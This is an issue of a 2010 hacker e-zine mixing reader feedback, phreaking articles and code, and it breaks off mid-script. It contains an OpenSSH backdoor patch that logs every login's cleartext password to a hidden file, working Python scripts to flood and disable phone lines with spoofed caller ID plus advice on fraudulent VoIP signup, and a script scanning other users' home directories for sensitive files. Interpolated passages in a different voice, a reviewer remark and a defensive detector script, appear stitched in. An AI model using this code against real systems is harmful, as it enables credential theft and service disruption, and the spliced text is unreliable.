Go Null Yourself E-Zine
Issue #2 - October 2010
www.GoNullYourself.org

"People who say it cannot be done should not interrupt those who are doing it."

|| 0x01 Introduction                          teh crew
|| 0x02 Feedback + Edits
|| 0x03 DoSing Phone Lines with Asterisk      b14ck
|| 0x04 duper's Code Corner                   duper
|| 0x05 Test Numbers                          storm
|| 0x06 Practical DLL Hijacking               storm
|| 0x07 Numbers Stations FOIA Request         teh crew
|| 0x08 Exploring Tieline Networks            Shadytel, Inc
|| 0x09 Modem Numbers                         storm
|| 0x0a Linux Full-Disk Encryption With TC    second
|| 0x0b Programming Challenge                 storm
|| 0x0c Hotel Pennsylvania's PBX              Shadytel, Inc
|| 0x0d Interview with Adrian Lamo
|| 0x0e Et Cetera, Etc.                       teh crew

[==================================================================================================]

-=[ 0x01 Introduction
-=[ Author: teh crew

Welcome to another issue of the Go Null Yourself e-zine, and, once again, glad you could join us.

You may have already noticed a few things different with this issue. First off, it was released
fairly quickly after issue #1 (July 2010), much more quickly than usual e-zine series, as we are
attempting to adopt a schedule of quarterly release. This means that lots of hard work is being put
forth by our authors to meet such short deadlines with a sufficient amount of comprehensive,
interesting content. For that, we express our deepest gratitude.
Secondly, we have changed a few aspects of the zine's formatting in general. The width has been
increased from 86 columns to 100, mostly for the sake of reducing the frequency of problems with line
wrapping in published code. It has also been requested that each article section be labeled with its
respective hexadecimal index number for easy page jumping. If you have any suggestions for the zine,
submit them to us (our contact information is at the end of this article), and we will certainly
consider them.

Thirdly, a large chunk of content this issue is phone-related. We wish to accomplish two goals by
doing this: 1) to promote interest in hacking technology besides computer systems, and 2) to pump
some life back into the phreaking scene. There is so much to learn from exploring the phone system,
and we hope to be there every step of the way.

If you are interested in submitting content for future issues of GNY Zine, we would be happy to
review it for publication. Content may take many forms, whether it be a paper, review, scan, or
first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some way
are also appreciated. Well-received topics include computer hacking and exploitation methods,
programming, telephone phreaking (both analog and digital), system and network exploration, hardware
hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics,
along with more abstract subjects such as psychology and culture. Both technical and non-technical
material is accepted.

Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent
via:

- IRC private message (storm or m0nkee @ irc.distrust.us #gny)
- Email (zine@gonullyourself.org)

If there is enough feedback, we will publish some of the messages in future issues.
We have devoted a lot of effort into this publication and hope that you learn something from reading
it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed,
utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless
citing certain passages) and give credit to the original authors when and where necessary.

Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or
damage that may result from the information presented within this publication. Although people will
be people and act in idiotic fashions, we do not condone, promote, or participate in illegal behavior
in any way.

[==================================================================================================]

-=[ 0x02 Feedback and Edits

This section is devoted to messages we've received regarding GNY Zine, both positive and negative.
Readers may also submit information that they feel supplements content from previous issues.
Significant errors in the zine will also be addressed.

----------------------------------------------------------------------------------------------------

Hey team. On the release of the new e-zine under the Alternate Data Streams article there's a little
typo. In the first example, using C:\folders:secrets.txt the paragraph below it refers to it as
"C:folders:secrets.txt". It's not something that should throw a reader off the deep end or anything.
I thought it should be pointed out in case you wanted to correct it.

I'm loving the articles so far. I hope you can keep up the work. I'll be coming back for sure.

Thanks,
-Boom

>> Ah, yes, you are correct - apologies for the error. "C:folders:secrets.txt" on line 412 of issue
>> #1 should be corrected to "C:\folders:secrets.txt". Thank you for reporting it and also for the
>> compliment.
----------------------------------------------------------------------------------------------------

rattle of www.awarenetwork.org posted the following on his website in response to the RTLO Spoofing
article from issue #1:

I had a lot of fun reading the RTLO article in the GNY zine and found myself very incompetent when
it came to inputting that RTLO char anywhere. Hence, I wrote a little program that would set my
clipboard to just the RTLO char, allowing me to paste it into browser forms and other stuff
conveniently. I did this because the other tool that was linked
[http://www.fileformat.info/tool/unicodeinput/index.htm] isn't open source. Granted, my app has no
GUI, but at least you can see its insides.

>> We agree that entering the RTLO character is quite tricky, and we thank you for publishing your
>> source code (below). Hopefully it is useful for other readers, as it's come in handy for us!
>> A pre-compiled Windows binary is available for download at
>> http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.exe

----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.asm

.386
.model flat, stdcall

include kernel32.inc
include user32.inc

.code
Main:
    PUSH 0
    CALL OpenClipboard
    TEST EAX, EAX
    JZ ERROR
    CALL EmptyClipboard
    PUSH 4                  ; size of RTOL with nullchar
    PUSH 2                  ; GMEM_MOVEABLE
    CALL GlobalAlloc
    TEST EAX,EAX
    JZ ERROR
    MOV EBX,EAX
    PUSH EBX
    CALL GlobalLock
    TEST EAX,EAX
    JZ ERROR
    MOV word ptr [EAX], 0202EH      ; U+202E RIGHT-TO-LEFT OVERRIDE
    MOV word ptr [EAX+2], 0         ; terminating null
    PUSH EBX
    CALL GlobalUnlock
    PUSH EBX                ; handle
    PUSH 0DH                ; CF_UNICODETEXT
    CALL SetClipboardData
    TEST EAX,EAX
    JZ FAILED               ; NULL: the clipboard refused the handle
    CALL CloseClipboard     ; success: the system now owns the block, so it must not be freed
    JMP SUCCESS
FAILED:
    PUSH EBX
    CALL GlobalFree         ; free the block only when the clipboard did not take ownership
    CALL CloseClipboard
ERROR:
    PUSH 1
    JMP BAIL
SUCCESS:
    PUSH 0
BAIL:
    CALL ExitProcess
END Main

----------
http://www.awarenetwork.org/home/.rants/07-11-2010.08.42/rtol.c

#include <windows.h>

int main()
{
    HGLOBAL handle;
    WCHAR *buffer;
    BOOL success = FALSE;

    if (OpenClipboard(NULL)) {
        EmptyClipboard();
        if ((handle = GlobalAlloc(GMEM_MOVEABLE, 2*sizeof(WCHAR))) &&
            (buffer = GlobalLock(handle))) {
            buffer[0] = 0x202E;     /* U+202E RIGHT-TO-LEFT OVERRIDE */
            buffer[1] = 0;          /* terminating null */
            GlobalUnlock(handle);
            success = (SetClipboardData(CF_UNICODETEXT, handle) != NULL);
            /* On success the system owns the block and it must not be freed;
               only release it when the clipboard refused the handle. */
            if (!success)
                GlobalFree(handle);
        }
        CloseClipboard();
    }
    return !success;
}

#if 0
extern void __cdecl mainCRTStartup( void ){
    ExitProcess(main());
}
#endif

----------------------------------------------------------------------------------------------------

There have been reports that the patched source from Trojaning OpenSSH in issue #1 crashes upon SSH
login. We regret and apologize for the error, which has been traced to an incorrect declaration of
the hidden_buff buffer on line 38. The updated code is below:

diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c
--- openssh-5.5p1/auth-passwd.c	2009-03-07 19:40:28.000000000 -0500
+++ openssh-5.5p1-backdoored/auth-passwd.c	2010-06-17 14:14:23.000000000 -0400
@@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const
 	}
 #endif
 	result = sys_auth_passwd(authctxt, password);
+
+	// Begin Backdoor
+
+	if ( result ){
+		snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s from %s\n",
->			authctxt->user, password, get_remote_ipaddr());
+		hidden_log();
+	} else {
+		snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from %s\n",
->			authctxt->user, password, get_remote_ipaddr());
+		hidden_log();
+	}
+
+	// End Backdoor
+
 	if (authctxt->force_pwchange)
 		disable_forwarding();
 	return (result && ok);
diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h
--- openssh-5.5p1/includes.h	2009-08-20 02:16:01.000000000 -0400
+++ openssh-5.5p1-backdoored/includes.h	2010-06-17 14:12:24.000000000 -0400
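Review bot: in the auth-passwd.c hunk the cleartext password of every attempt, successful or not, is formatted into hidden_buff and handed to hidden_log(), so the two branches differ only in their prefix string; for anyone auditing a build of sshd, the added code immediately after the sys_auth_passwd() call and the file named by HIDDEN_LOG_FILE are the artifacts to look for. The `->` opening the two wrapped continuation lines is the zine's line-wrap marker, not part of the patch.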
@@ -172,4 +172,24 @@
 #include "entropy.h";
+// Begin Backdoor
+
+#include
+#include
+#define HIDDEN_LOG_FILE "/tmp/.ssh_log"
+
+FILE *hiddenlog;
+char hidden_buff[1024];
+
+#define hidden_log() { \
+	chmod(HIDDEN_LOG_FILE, 0666); \
+	hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \
+	if ( hiddenlog != NULL ) { \
+		fprintf(hiddenlog, "%s", hidden_buff); \
+		fclose(hiddenlog); \
+	} \
+}
+
+// End Backdoor
+
 #endif /* INCLUDES_H */

----------------------------------------------------------------------------------------------------

Our long-time friend sunjester posted the following at http://fusecurity.com/blog/?p=186 in response
to issue #1:

GNY is a familiar group to myself. They do not like me on account of several reasons that we won't
go into here. The 'ezine' they released isn't offering much, so you didn't miss much if you're
looking for another hacking zine to veg out to. I have some comments of my own about their release.
I saw that r00tsecurity referenced the Zine in their newsletter, in which case I had to look at it..

>> Yes, there is a bit of bad blood between sunjester and GNY. We also won't go into details, as
>> they are irrelevant.

1. conversational hypnosis
2. RTLO Spoofing
3. Alternate Data Streams
4. Derandomizing Perl's Random Number Generator
5. Trojaning OpenSSH
6. Story of a Raid
7. Programming Challenge
8. ConfCon 2010 CFP
9. 907-887-88xx Scan

conversational hypnosis

The first thing on their list is something called 'conversational hypnosis'; the whole thing was
complete b.s. Nothing described really actually told anyone how to apply or use 'covert hypnosis',
which is what it is more widely known as. This whole idea is based around notions and persuasion.

>> I wrote the article with the specific intention of not giving enough detail for readers to be
>> able to use it since it can really cause damage. It was just to show that it was out there and
>> said to listen to Taylor Starr's lectures if you wanted to learn it in depth.
>> -hsu

rtlo spoofing

The reason this isn't so successful is because it's not very practical and it's a pain in the ass to
use. This guy (Anarchy_Angel) basically just read the documents and wrote what he read. No PoC was
offered or instructions or anything different than what was presented in the documents he referenced
([http://packetstormsecurity.org/papers/general/righttoleften-override.pdf],
[http://hackers-hideaway.com/blog.php?post_id=94],
[http://www.mozilla.org/security/announce/2009/mfsa2009-62.html]). I'm not going to continue to
break down this method.

>> Actually, no. I (storm) wrote the article - it says so right at the top. Anarchy_Angel's
>> research was simply referenced. And yes, I wrote an article based on information I read. That's
>> usually how it works. The referenced paper on packetstormsecurity.org is written in broken
>> English, so I'm sure many will appreciate reading a paper that is easily decipherable;
>> hackers-hideaway.com was offline at the time (and continues to be offline), so Anarchy's research
>> is unavailable; and the mozilla.org link is simply an advisory. As for proof of concept, three
>> example attacks were explained in the paper. I also explained how the GNY forum was affected by
>> an RTLO spoofing attack.

Alternate Data Streams

At first glance I thought it may be worth reading until I kept scrolling down scanning through and
pulling out keywords, etc, etc. Scanning back to the top I started reading and it was apparent from
reading the first couple paragraphs that this person had not done much research, or offered a
solution to finding or protecting yourself against such flaws. The first thing people should know is
that there is an EASY way to view alternate data streams. Microsoft provides an application named
'Streams' to help view ADSs. You can download and read about it here. He references the application
but never shows how to use it, link to it, or even talk about it.
He obviously rushed through and didn't give a crap about the actual content going into the message
he was conveying in the article. While I don't deny information provided from the article can be
useful and may have shown people something new, ADS. The information wasn't very fruitful, and could
have been presented a lot better. Amir refers to metadata as 'real data'. He references forking but
I guess he didn't bother to read it; if he had read the page he would have seen that it was named
'metadata', lmao. This was a good topic, it just should have been elaborated on more.

>> "I'd like to thank you for taking the time to review my article... I see you have some valid
>> points, but you assumed that I 'rushed' in with the topic, which is not exactly true. When this
>> topic was first introduced to me, I liked it and I wanted to write a brief article to educate
>> others about it. It was not new research, and it was not something that is security related at
>> all. I was merely trying to let others know of the existence of such a thing. And by the way my
>> name is 'Amr' not 'Amir'. Have a good one :-)" -d4de

Derandomizing Perl's Random Number Generator

While it's fun to talk about and figure things like this out, it's not very effective for hacking or
really having anything to do with computer security.

>> Random numbers have everything to do with computer security. Attacks based on the prediction of
>> random numbers, such as http://seclists.org/fulldisclosure/2010/Apr/167 , are becoming more and
>> more practical. A cryptographic process based on predictable numbers is a broken process.
>> Besides, we're not limited to content based solely on computer security. Anything that breaks or
>> circumvents a system of any kind is fascinating to us.

Trojaning OpenSSH

yep, he did all that from a root terminal...

>> So what's your point?

Story of a Raid

The crap this kid must have been smoking must be unbelievable! Damn, send some my way.
Let's highlight some of the dumbest shit he said. It's super ridiculous so let's keep it simple and
try not to waste too much time on this dumb, uninformative stereotypical story.

1. and it really will leave me open to anything the FBI wants to portray me as.
2. Incriminating evidence - Sure, it's just a simple server-client program in C
3. However, even if I did have a magnet, there is little time to do anything once they bust in.
4. My parents didn't completely realize what was going on

And my response..

1. Really? did they do it x-files style or 'hackers' style? Kicking in the door with one foot while
wielding a gun in the other? A friend of mine was raided last year, and once before that a few years
before. The FBI certainly didn't kick in his door.

>> "'Hackers' style, they did literally kick in the door with guns held" -OrderZero

2. A client server application is hardly a crime, and would never be considered one.

>> "Are you aware of what a trojan /is/?" -OrderZero

3. Really? Do you know how much of a magnetic field is required to reset the drive? Yo momma's fridge
magnet ain't gonna work.

>> "Yes I do and I never said a fridge magnet." -OrderZero

4. Wow, you still live with your parents? You're saying that the FBI would raid someone's house
without knowing who was inside? I guess they wouldn't have traced the IP back to the ISP and called
around huh? Go sit in the corner, change your name, and come back.

>> "What does the FBI knowing who was inside have to do with what I said at all? Yes, I live with
>> friends and family (or I did...). I'm 18-years-old. Honestly, if you're trying to insult me,
>> kindly rephrase it and actually make it relevant to the story, please and thanks." -OrderZero

ConfCon CFP

What is this, 1989?

>> *looks at calendar*

907-887-88xx Scan

come on guys, move into the new fuckin' millennium..

>> It's a damn shame your lack of curiosity is limiting your mind so severely. Pick up your phone
>> and tell me if you hear a dialtone. Last I checked, there was still an entire PSTN waiting to be
>> explored.

Et Cetera, Etc.

I could only read so much and all I have to say is these people have a long way to go before
actually becoming anything close to a hacker or having any kind of 'hacking ethics'. In closing, be
sure to know that the next release will be just as boring and shitty. Sorry guys but this was
HORRIBLE and not worth reading or making the effort to archive.

>> :D

[==================================================================================================]

-=[ 0x03 DoSing Phone Lines with Asterisk
-=[ Author: b14ck
-=[ Website: http://projectb14ck.org/

Table of contents

1. Intro
2. Requirements
3. Installing pycall
4. Strategy
5. Your First DoS
6. A More Advanced DoS Technique
7. Tips
8. Conclusion
9. Questions?

Intro
-----

Denial of Service attacks are nothing new to people in the IT and computer security world. DoS
attacks are a very simplistic form of attack which aim to flood the target (whether it be a
computer, mobile device, or phone line) with traffic so that it cannot process legitimate traffic.
While being simple to perform, DoS attacks are often difficult to defend against without significant
downtime.

Today I'm going to show you how to perform a DoS attack on a phone line. This process is simple,
quick to perform, and very illegal. Before we get started, I'd just like to remind you that this
article is for educational purposes only! All the code I'm putting into this article is python, and
should work on any system with python 2.4+.

Requirements
------------

Now, in order to follow along you will need 3 main things:

* An Asterisk PBX system (our favorite open source PBX) set up and running.
* A lot of phone lines. We'll need a lot of phone lines because we'll need to place a lot of
  simultaneous calls. If you don't have hard lines, get a VoIP line (I prefer this method) as they
  are really cheap and quick to set up.
* The last thing you'll need is my pycall python library.
This is a library I wrote which allows us to create Asterisk call files quickly and easily in python.
(http://github.com/comradeb14ck/pycall)

For those of you unfamiliar with Asterisk, I'd highly recommend reading the PDF book Asterisk: The
Future of Telephony, which is a great guide to getting started with Asterisk.
(http://downloads.oreilly.com/books/9780596510480.pdf)

The pycall python library mentioned above is a project I created a month or so ago which makes
placing calls through Asterisk a simple task for python developers. Call files are specially
formatted text files which Asterisk processes and performs actions on. pycall simplifies and
abstracts a great deal of the call file creation process, as call files have many small quirks which
make them difficult to work with. Using pycall greatly reduces the amount of code we'll need to write
and ensures that all call files are created in a secure, efficient manner.

For this article, we'll be using my pycall library as a medium for quickly making calls through
Asterisk without digging into the details. If you want to know more about pycall check out the Why
pycall? document on the project's wiki page.

Installing pycall
-----------------

The good news is that pycall installs simply (it's a portable python module) and will work out of
the box with no modifications to your system whatsoever (as long as you are running some form of
linux). To make things even easier, I've created a small shell script which you can run that will
download and install pycall, then delete itself:

----------
#!/bin/bash
#
# pycall-install.sh
#
# @author: Randall Degges
# @email: rdegges@gmail.com
# @date: 11-20-2009
#
# This program installs the pycall library on any linux machine which has
# python 2.4+.
#

MIRROR=http://cloud.github.com/downloads/comradeb14ck/pycall/
NAME=pycall
VER=1.2

wget $MIRROR$NAME-$VER.tar.gz
tar zxvf $NAME-$VER.tar.gz
cd $NAME-$VER
sudo python setup.py install
cd ..
rm -rf $NAME-$VER
rm -rf $NAME-$VER.tar.gz
echo "Finished installing pycall-$VER."
----------

You can copy the script above and run it to install the library on any linux system quickly. Next,
we'll write a simple application which will call your cell phone in order to make sure everything is
working. Here is the source.

NOTE: You will need to modify this code and fill in the appropriate details for your system. The
user field (which seems a little ambiguous) refers to the user account that Asterisk is running
under. If you want to create the call file as whatever user you are currently logged in as, you can
remove that field altogether.

----------
#!/usr/bin/python
"""
hello-world.py

@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09

This program tests the pycall library and makes sure that you are able to
place calls correctly.
"""

from pycall.callfile import *


def main():
    """
    Create a call to your cell phone (for testing). It will say 'hello world'
    then hang up on you.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        number = '18182223333',
        application = 'Playback',
        data = 'hello-world',
        user = 'asterisk'
    )
    testcall.run()


if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------

A quick note to non-telephony people. The above code generates a text file (call file) which is then
moved to the Asterisk spooling directory: /var/spool/asterisk/outgoing. Asterisk aggressively
monitors the spooling directory for call files (like the ones we are creating), parses them, and
performs the actions specified by the call file. In this case, we are telling Asterisk to call our
cell phone, and once we pick up, play a sound file that says "hello world" and then hang up. In case
you are wondering, Asterisk contains the "hello world" sound file by default, which is why we don't
need anything else to make this work.
Strategy
--------

Now that we have our tools ready to go, let's discuss our strategy for disabling the target phone
line. The goal of the attack is to prevent the target phone number from placing and receiving calls.
As you can probably imagine, this is completely devastating to businesses and other
communication-dependent organizations, as it completely breaks down communications. Many companies
in particular rely on telephone service (think pizza places and call centers) for their primary
revenue stream. Imagine the effect a 24-hour DoS attack can have on a business that relies on phone
service... It can be very impacting.

Our strategy is simple: to call the target phone number more times than they have phone lines.

You might be thinking: This is really easy, all I have to do is pick up my phone, and keep dialing
the target number over and over again to keep their phone line tied up. In reality, this does
sometimes work. A great example is the 2002 New Hampshire Senate election phone jamming scandal. See
http://en.wikipedia.org/wiki/2002_New_Hampshire_Senate_election_phone_jamming_scandal. Basically,
"the NHGOP hired GOP Marketplace, based in Northern Virginia, to jam another phone bank being used by
the state Democratic Party and the firefighters' union for efforts to turn out voters on behalf of
then-governor Jeanne Shaheen on Election Day." And just in case you are wondering, yes, he went to
jail. :)

In reality, most businesses and other places have more than a single phone line that is connected to
their phone number. PRIs, T1s, and VoIP are all common now, which means that in order to completely
prevent one of those phone lines from placing calls, you will need to be generating upwards of 23
simultaneous calls to completely disable the target. If you know anything about your target phone
line, then you probably know how many calls you will need to place at any given time to keep them
busy. But don't worry if you don't know anything about your target!
This will be covered later in this article.

Your First DoS
--------------

The program below contains the source of a simple flooding application. You will still have to make
your original adjustments like you did to the hello-world.py application earlier, but that's all, I
promise!

----------
#!/usr/bin/python
"""
simple-flood.py

@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09

This program floods the specified phone number.
"""

from time import sleep
from sys import argv, exit
from pycall.callfile import *


def call(num):
    """
    Create a call to the specified number which does nothing except hang up.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        number = num,
        application = 'Hangup',
        data = ' ',
        user = 'asterisk'
    )
    testcall.run()


def main():
    """
    Control the application logic.
    """
    if len(argv) < 3:
        print 'Usage: %s [number] [calls-per-minute]' % argv[0]
        exit(1)

    number = argv[1]
    try:
        cpm = int(argv[2])
    except ValueError:
        cpm = 1

    print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)

    count = 1
    while True:
        for x in xrange(cpm):
            print 'Placing call %d...' % count
            call(number)
            count = count + 1
        sleep(60)


if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------

This small program (only a few lines!) is able to completely paralyze a target number (considering
you have enough phone lines). It is fairly flexible, and allows you to specify the amount of
calls-per-minute that you'd like to place. This works just like described: If you tell it to run
with 60 calls per minute, then you'll immediately place 60 calls. These calls will ring to the target
number, and once they pick up the phone, will immediately hang up.

To run this program see the usage:

./simple-flood.py [number] [calls-per-minute]
./simple-flood.py 18002223333 5

The first parameter is the number you want to flood, and the second is the amount of calls per
minute that you'd like to place to that number.
Here's what it should look like running if everything goes smoothly:

[root@blackbox randall]# ./simple-flood.py 18182223333 5
Starting call flood on target: 18182179229. Placing 5 calls per minute.
Placing call 1...
Placing call 2...
Placing call 3...
Placing call 4...
Placing call 5...
Placing call 6...
Placing call 7...
Placing call 8...
Placing call 9...
Placing call 10...

Now, obviously, DoS attacks like this are simple to defend against as the victim can simply block
the particular number you are calling from. However--there are ways around this too!

A More Advanced DoS Technique
-----------------------------

To make it harder for the victim to defend against our simple DoS attack, let's add caller ID
spoofing to the calls as well (will only work if your provider allows it) so that the target can't
blacklist a single number because you are calling them from random numbers! Not only is doing this
simple, it is also highly effective. Imagine being a business owner, and instantly getting 100 calls
from 100 different numbers. You'd be confused, unable to do anything except unplug your phone lines
(which doesn't accomplish anything), and unable to receive business.

So here is our program with caller ID spoofing included. It is still used the same way, except MUCH
harder to defend against.

----------
#!/usr/bin/python
"""
advanced-flood.py

@author: Randall Degges
@email: rdegges@gmail.com
@date: 11-20-09

This program floods the specified phone number and spoofs caller ID making
it much harder to trace / prevent.
"""

from time import sleep
from sys import argv, exit
from pycall.callfile import *
from random import seed, randint


def genid():
    """
    Generate a random 10-digit US telephone number for spoofing to.
    """
    return str(randint(1000000000, 9999999999))


def call(num, cid):
    """
    Create a call to the specified number which does nothing except hang up.
    Also spoofs caller ID to a random 10 digit number.
    """
    testcall = CallFile(
        trunk_type = 'SIP',
        trunk_name = 'flowroute',
        callerid_num = cid,
        number = num,
        application = 'Hangup',
        data = ' ',
        user = 'asterisk'
    )
    testcall.run()


def main():
    """
    Control the application logic.
    """
    seed()  # seed the random number generator

    if len(argv) < 3:
        print 'Usage: %s [number] [calls-per-minute]' % argv[0]
        exit(1)

    number = argv[1]
    try:
        cpm = int(argv[2])
    except ValueError:
        cpm = 1

    print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)

    count = 1
    while True:
        for x in xrange(cpm):
            cid = genid()
            print 'Placing call %d using caller ID %s...' % (count, cid)
            call(number, cid)
            count = count + 1
        sleep(60)


if __name__ == '__main__':
    """
    Program execution begins here.
    """
    main()
----------

Here's an example of what this program should look like running. Note that it generates a different
caller ID for each call. >:)

[root@blackbox randall]# ./advanced-flood.py 18182223333 7
Starting call flood on target: 18182223333. Placing 7 calls per minute.
Placing call 1 using caller ID 7110992417...
Placing call 2 using caller ID 3689407130...
Placing call 3 using caller ID 4139439982...
Placing call 4 using caller ID 9795095964...
Placing call 5 using caller ID 5278670787...
Placing call 6 using caller ID 6684773360...
Placing call 7 using caller ID 2716775282...

Now this is a lot better!

Tips
----

The first tip is for those of you who don't know how many calls you have to place to disable your
target. USE VOIP! VoIP providers are great for DoS attacks because they:

* Can be purchased online using a fake name / credit card.
* Are cheap (much less expensive than analog lines) and don't require additional hardware.
* Can place a ton of calls quickly. With hard lines you are limited to very few channels. With most
  VoIP lines, you are only limited by your bandwidth.

Of the 3 reasons above, reason 3 is particularly important. VoIP calls use either the IAX or SIP
protocols to initiate calls.
When VoIP calls are made, SIP packets are sent back and forth from your server to your VoIP
provider, who then relays the call to the target. What is special about this is that it uses almost
no bandwidth. The only thing being transmitted are IAX or SIP packets (which are small). The actual
bulk of bandwidth usage typically associated with VoIP calls comes into play once a call has been
answered. Once a call is answered, an RTP stream is opened which then sends large voice packets
across your connection, thereby increasing your bandwidth usage immensely.

Why does this matter? It matters because it gives you a killer advantage that your target does not
have. It gives you an easier way to scale your attack. Let's say a target phone number has 5 lines.
Let's also assume that you are running this DoS from a home computer with an extremely limited
internet connection that restricts you to 10KB/s up. That typically wouldn't be enough for a single
VoIP call, so you would never be able to make 5 calls and flood your target. WRONG. Since you call
the target and immediately hang up, there are no RTP packets! This means that you can place as many
simultaneous calls as you can send SIP invites (a LOT).

Conclusion
----------

With the information and source code provided, you should be able to easily DoS yourself or stress
test other phone numbers in no time. I've started development on what will soon be a fully completed
Asterisk DoS client with lots of juicy command line options, statistics, and other cool items. If
you're interested in following my progress, feel free to check out the project page for it at
http://github.com/comradeb14ck/asteriskdos.

And that's about it!
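The flood pattern this article describes has a recognisable shape on the receiving PBX: many calls per minute to one number, each disconnected within a second or two, and in the caller-ID-spoofed variant a different source number on every call. The detector below is an added, defender-side example and is not code from the article or from pycall; its four-field record layout (start time, caller ID, destination, seconds connected) and the thresholds are assumptions, and the call records are constructed, so real Asterisk CDR output would first have to be mapped onto those fields.

```python
"""
Detect a call flood in a stream of simplified call records.

Each record is a constructed tuple: (start time, caller ID, destination,
seconds connected). The layout and the thresholds below are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: a normal afternoon at a shop, then the spoofed-source
# flood pattern (zero connected seconds, a fresh 10-digit caller ID each call).
SAMPLE_CDR = [
    ("2010-10-01 12:00:05", "8185550101", "18182223333", 95),
    ("2010-10-01 12:03:40", "8185550102", "18182223333", 130),
    ("2010-10-01 12:09:12", "8185550103", "18185550199", 45),
] + [
    ("2010-10-01 12:10:%02d" % (i * 7), "%010d" % (1000000000 + i * 97531),
     "18182223333", 0)
    for i in range(8)
]


def parse(record):
    """Turn one record into (datetime, caller ID, destination, billsec)."""
    ts, src, dst, billsec = record
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), src, dst, int(billsec)


def find_floods(records, window=timedelta(seconds=60), min_calls=5, max_billsec=1):
    """
    Slide a per-destination window over the records (assumed sorted by start
    time). A destination is flagged when at least `min_calls` calls start
    within `window` and at least 80% of them are disconnected within
    `max_billsec` seconds. Returns destination -> (calls in the window,
    distinct caller IDs, short calls) for the first window that triggers.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, src, dst, billsec in map(parse, records):
        q = recent[dst]
        q.append((ts, src, billsec))
        while q and ts - q[0][0] > window:      # drop calls older than the window
            q.popleft()
        if dst in alerts or len(q) < min_calls:
            continue
        short = sum(1 for _, _, b in q if b <= max_billsec)
        if short * 10 >= len(q) * 8:            # >= 80% immediate hang-ups
            alerts[dst] = (len(q), len({s for _, s, _ in q}), short)
    return alerts


def classify(alert):
    """
    Separate the two variants: one source number can simply be blocked,
    many distinct caller IDs mean spoofing and call for rate limiting on
    the inbound trunk instead.
    """
    calls, distinct, short = alert
    if distinct == 1:
        return "single-source flood: block the caller ID"
    return "spoofed-source flood (%d caller IDs in %d calls): rate-limit the trunk" % (
        distinct, calls)


if __name__ == "__main__":
    for dst, alert in find_floods(SAMPLE_CDR).items():
        print("%s: %s" % (dst, classify(alert)))
```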
[==================================================================================================]

-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/

#!/bin/bash
#
#  _   _   _   _   _   _   _     _   _   _   _     _   _   _   _   _   _
# / \ / \ / \ / \ / \ / \ / \   / \ / \ / \ / \   / \ / \ / \ / \ / \ / \
#( d | u | p | e | r | ' | s ) ( c | o | d | e ) ( c | o | r | n | e | r )
# \_/ \_/ \_/ \_/ \_/ \_/ \_/   \_/ \_/ \_/ \_/   \_/ \_/ \_/ \_/ \_/ \_/
#
#
# scan-home-dirs.bash by duper for GNY
# Fri Oct  1 04:57:00 UTC 2010
#
# A bash script that scans home directories and other filesystem directory
# hierarchies for sensitive data conducive to attacks against local privilege
# escalation..
#
# NOTE: this script requires GNU parallel as a prerequisite. You may need to
# install the tarball from http://gnu.org/software/parallel first..
#
# Feel free to add your own common directories, subdirectories, "hidden"
# dot-files and such to scan. The regular expression for matching sensitive data
# can be easily configured as well.
#
# This is the command I use for finding new filenames to add to the script:
#
#   nice -2 find / \( -type f -or -type d \) -and \( -perm /0001 -or \
#     -perm /0002 \) -and \( -not -iname "/proc/*" -and -name ".*" -or \
#     -iname "*.cf" -or -iname "*.conf" \) -and -not -empty \
#     -fls /tmp/find.$$ 2>/dev/null
#
# ..obviously the output goes to /tmp. This script essentially allows you to
# discover data in hidden files within directories that you may not necessarily
# have read access to -- If you've ever seen dirbx.c, a brute force executable
# directory lister by dmuz and methodic, then you probably understand this
# concept already. However, the problem with dirbx is that it takes too long
# to generate all the filename combinations. Therefore, scan-home-dirs (this
# script) just uses well-known file and directory names to expedite the process.
#
# If you're not familiar with dirbx, I'm including an excerpt of the mailing
# list message from whence it first appeared:
#
#   "AngryPacket Security is proud to announce the release of dirbx! dirbx is
#   a brute force executable directory and file enumerator. It could prove
#   to be very useful in local pen-tests where you don't have UID 0 and some
#   directories have "--x" permissions."
#
# So in other words, you're going to get `Permission denied' if you try to run
# /bin/ls on a directory with only the world execute bit set. Regardless, you
# can still view world readable files inside that directory if you provide
# /bin/cat with a full pathname. For example:
#
#   [super@callisto ~]$ ls -ld /home/whye
#   drwx-----x 13 whye whye 4096 Sep 21 04:35 /home/whye
#   [super@callisto ~]$ ls /home/whye
#   ls: /home/whye: Permission denied
#   [super@callisto ~]$ ls -ld /home/whye/.bashrc
#   -rw-r--r-- 1 whye whye 225 Mar 21  2010 /home/whye/.bashrc
#   [super@callisto ~]$ head -4 /home/whye/.bashrc
#   # .bashrc
#
#   # Source global definitions
#   if [ -f /etc/bashrc ]; then
#   [super@callisto ~]$
#

# Display program banner
echo
echo 'scan-home-dirs.bash by duper for GNY'
echo '===================================='
echo

# First, we'll look through directories that we ARE able to read
declare -a alist=$(ls -altd /home/*/.* | awk '/^d/ {print($9)}' | \
